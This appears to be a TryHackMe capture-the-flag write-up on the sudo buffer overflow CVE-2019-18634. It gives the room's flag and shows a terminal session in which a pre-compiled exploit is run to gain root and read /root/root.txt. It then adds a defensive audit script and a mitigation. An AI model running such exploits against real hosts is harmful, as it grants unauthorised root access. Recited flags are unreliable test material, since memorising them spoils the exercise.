Information
Room
- Name: Sudo Buffer Overflow
- Profile: tryhackme.com
- Difficulty: Easy
- Description: A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series
Write-up
Buffer Overflow
What's the flag in /root/root.txt?
Answer: THM{buff3r_0v3rfl0w_rul3s}
All we have to do here is use the pre-compiled exploit for CVE-2019-18634:
tryhackme@sudo-bof:~$ ls -lh
total 20K
-rwxr-xr-x 1 root root 18K Feb 8 2020 exploit
tryhackme@sudo-bof:~$ ./exploit
[sudo] password for tryhackme:
Sorry, try again.
# cat /root/root.txt
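
A defender-side audit for the condition this room exploits, added here as an example and not part of the room or the original write-up: CVE-2019-18634 is only reachable when the sudoers `pwfeedback` option is enabled, and upstream fixed it in sudo 1.8.31. The function names and the `--run` switch are hypothetical.

```shell
#!/bin/sh
# Added example: defensive audit for CVE-2019-18634 (function names are hypothetical).

# Succeeds if the version string lies in the range upstream lists as
# containing the flaw: 1.7.1 through 1.8.30 (fixed in 1.8.31).
version_affected() {
    v=${1%%[!0-9.]*}              # drop suffixes such as "p2"
    old_ifs=$IFS; IFS=.
    set -- $v                     # split into major, minor, patch
    IFS=$old_ifs
    n=$(( ${1:-0} * 10000 + ${2:-0} * 100 + ${3:-0} ))
    [ "$n" -ge 10701 ] && [ "$n" -le 10830 ]
}

# Reads sudoers text on stdin; succeeds if pwfeedback ends up enabled.
# Later Defaults lines override earlier ones. Scoped entries
# (Defaults:user, Defaults@host) are treated like global ones, which
# errs on the side of reporting.
pwfeedback_enabled() {
    awk '
        { sub(/#.*/, "") }                       # strip comments
        /^[ \t]*Defaults/ {
            n = split($0, tok, /[ \t,]+/)
            for (i = 1; i <= n; i++) {
                if (tok[i] == "pwfeedback")  on = 1
                if (tok[i] == "!pwfeedback") on = 0
            }
        }
        END { exit(on ? 0 : 1) }
    '
}

# Audits the local host. Reading sudoers needs root.
check_host() {
    ver=$(sudo -V 2>/dev/null | sed -n '1s/^Sudo version //p')
    if ! version_affected "$ver"; then
        echo "sudo ${ver:-not found}: outside the affected range"
    elif cat /etc/sudoers /etc/sudoers.d/* 2>/dev/null | pwfeedback_enabled; then
        echo "sudo $ver: pwfeedback enabled; upgrade or set 'Defaults !pwfeedback'"
    else
        echo "sudo $ver: affected version, but pwfeedback is not enabled"
    fi
}

# Run the audit only when asked, e.g.: sh check.sh --run
if [ "${1:-}" = "--run" ]; then check_host; fi
```

On a host that cannot be upgraded right away, `Defaults !pwfeedback` in sudoers removes the vulnerable code path.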